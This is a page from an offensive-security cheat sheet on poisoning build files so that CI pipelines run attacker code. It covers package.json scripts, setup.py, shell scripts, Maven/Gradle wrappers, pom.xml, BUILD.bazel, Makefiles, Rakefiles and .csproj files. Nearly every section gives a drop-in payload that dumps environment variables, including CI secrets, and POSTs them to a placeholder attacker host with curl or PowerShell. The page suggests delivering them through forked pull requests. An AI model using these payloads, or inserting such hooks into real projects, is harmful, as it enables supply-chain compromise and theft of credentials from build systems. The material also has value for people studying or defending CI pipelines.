package-managers.md (6502B)
1 --- 2 title: "Package Managers and Build Files" 3 section: "DevOps" 4 sectionSlug: "devops" 5 sourcePath: "docs/devops/package-managers.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/devops/package-managers.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Package Managers and Build Files 12 13 > Code injections into build files are CI agnostic and therefore they make great targets when you don't know what system builds the repository, or if there are multiple CI's in the process. In the examples below you need to either replace the files with the sample payloads, or inject your own payloads into existing files by editing just a part of them. If the CI builds forked pull requests then your payload may run in the CI. 14 15 ## Summary 16 17 - [Javascript / Typescript - package.json](#javascript--typescript---packagejson) 18 - [Python - setup.py](#python---setuppy) 19 - [Bash / sh - *.sh](#bash--sh---sh) 20 - [Maven / Gradle](#maven--gradle) 21 - [BUILD.bazel](#buildbazel) 22 - [Makefile](#makefile) 23 - [Rakefile](#rakefile) 24 - [C# - *.csproj](#c---csproj) 25 26 ## Javascript / Typescript - package.json 27 28 The `package.json` file is used by many Javascript / Typescript package managers (`yarn`,`npm`,`pnpm`,`npx`....). 29 30 The file may contain a `scripts` object with custom commands to run.\ 31 `preinstall`, `install`, `build` & `test` are often executed by default in most CI/CD pipelines - hence they are good targets for injection. 32 33 If you come across a `package.json` file - edit the `scripts` object and inject your instruction there 34 35 NOTE: the payloads in the instructions above must be `json escaped`. 36 37 Example: 38 39 ```json 40 { 41 "name": "my_package", 42 "description": "", 43 "version": "1.0.0", 44 "scripts": { 45 "preinstall": "set | curl -X POST --data-binary @- {YourHostName}", 46 "install": "set | curl -X POST --data-binary @- {YourHostName}", 47 "build": "set | curl -X POST --data-binary @- {YourHostName}", 48 "test": "set | curl -X POST --data-binary @- {YourHostName}" 49 }, 50 "repository": { 51 "type": "git", 52 "url": "https://github.com/foobar/my_package.git" 53 }, 54 "keywords": [], 55 "author": "C.Norris" 56 } 57 ``` 58 59 ## Python - setup.py 60 61 > `setup.py` is used by python's package managers during the build process. 62 It is often executed by default.\ 63 > Replacing the setup.py files with the following payload may trigger their execution by the CI. 64 65 ```python 66 import os 67 68 os.system('set | curl -X POST --data-binary @- {YourHostName}') 69 ``` 70 71 ## Bash / sh - *.sh 72 73 > Shell scripts in the repository are often executed in custom CI/CD pipelines.\ 74 > Replacing all the `.sh` files in the repo and submitting a pull request may trigger their execution by the CI. 75 76 ```shell 77 set | curl -X POST --data-binary @- {YourHostName} 78 ``` 79 80 ## Maven / Gradle 81 82 > These package managers come with "wrappers" that help with running custom commands for building / testing the project.\ 83 These wrappers are essentially executable shell/cmd scripts. 84 Replace them with your payloads to have them executed: 85 86 - `gradlew` 87 - `mvnw` 88 - `gradlew.bat` (windows) 89 - `mvnw.cmd` (windows) 90 91 > Occasionally the wrappers will not be present in the repository.\ 92 > In such cases you can edit the `pom.xml` file, which instructs maven what dependencies to fetch and which `plugins` to run.\ 93 > Some plugins allow code execution, here's an example of the common plugin `org.codehaus.mojo`.\ 94 > If the `pom.xml` file you're targeting already contains a `<plugins>` instruction then simply add another `<plugin>` node under it.\ 95 > If if **doesn't** contain a `<plugins>` node then add it under the `<build>` node. 96 97 NOTE: remember that your payload is inserted in an XML document - XML special characters must be escaped. 98 99 ```xml 100 <build> 101 <plugins> 102 <plugin> 103 <groupId>org.codehaus.mojo</groupId> 104 <artifactId>exec-maven-plugin</artifactId> 105 <version>1.6.0</version> 106 <executions> 107 <execution> 108 <id>run-script</id> 109 <phase>validate</phase> 110 <goals> 111 <goal>exec</goal> 112 </goals> 113 </execution> 114 </executions> 115 <configuration> 116 <executable>bash</executable> 117 <arguments> 118 <argument> 119 -c 120 </argument> 121 <argument>{XML-Escaped-Payload}</ argument> 122 </arguments> 123 </configuration> 124 </plugin> 125 </plugins> 126 </build> 127 ``` 128 129 ## BUILD.bazel 130 131 > Replace the content of `BUILD.bazel` with the following payload 132 133 NOTE: `BUILD.bazel` requires escaping backslashes.\ 134 Replace any `\` with `\\` inside your payload. 135 136 ```shell 137 genrule( 138 name = "build", 139 outs = ["foo"], 140 cmd = "{Escaped-Shell-Payload}", 141 visibility = ["//visibility:public"], 142 ) 143 ``` 144 145 ## Makefile 146 147 > Make files are often executed by build pipelines for projects written in `C`, `C++` or `Go` (but not exclusively).\ 148 > There are several utilities that execute `Makefile`, the most common are `GNU Make` & `Make`.\ 149 > Replace your target `Makefile` with the following payload 150 151 ```shell 152 .MAIN: build 153 .DEFAULT_GOAL := build 154 .PHONY: all 155 all: 156 set | curl -X POST --data-binary @- {YourHostName} 157 build: 158 set | curl -X POST --data-binary @- {YourHostName} 159 compile: 160 set | curl -X POST --data-binary @- {YourHostName} 161 default: 162 set | curl -X POST --data-binary @- {YourHostName} 163 ``` 164 165 ### Rakefile 166 167 > Rake files are similar to `Makefile` but for Ruby projects.\ 168 > Replace your target `Rakefile` with the following payload 169 170 ```shell 171 task :pre_task do 172 sh "{Payload}" 173 end 174 175 task :build do 176 sh "{Payload}" 177 end 178 179 task :test do 180 sh "{Payload}" 181 end 182 183 task :install do 184 sh "{Payload}" 185 end 186 187 task :default => [:build] 188 ``` 189 190 ## C# - *.csproj 191 192 > `.csproj` files are build file for the `C#` runtime. 193 > They are constructed as XML files that contain the different dependencies that are required to build the project. 194 > Replacing all the `.csproj` files in the repo with the following payload may trigger their execution by the CI. 195 196 NOTE: Since this is an XML file - XML special characters must be escaped. 197 198 ```powershell 199 <Project> 200 <Target Name="SendEnvVariables" BeforeTargets="Build;BeforeBuild;BeforeCompile"> 201 <Exec Command="powershell -Command "$envBody = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes((Get-ChildItem env: | Format-List | Out-String))); Invoke-WebRequest -Uri {YourHostName} -Method POST -Body $envBody"" /> 202 </Target> 203 </Project> 204 ```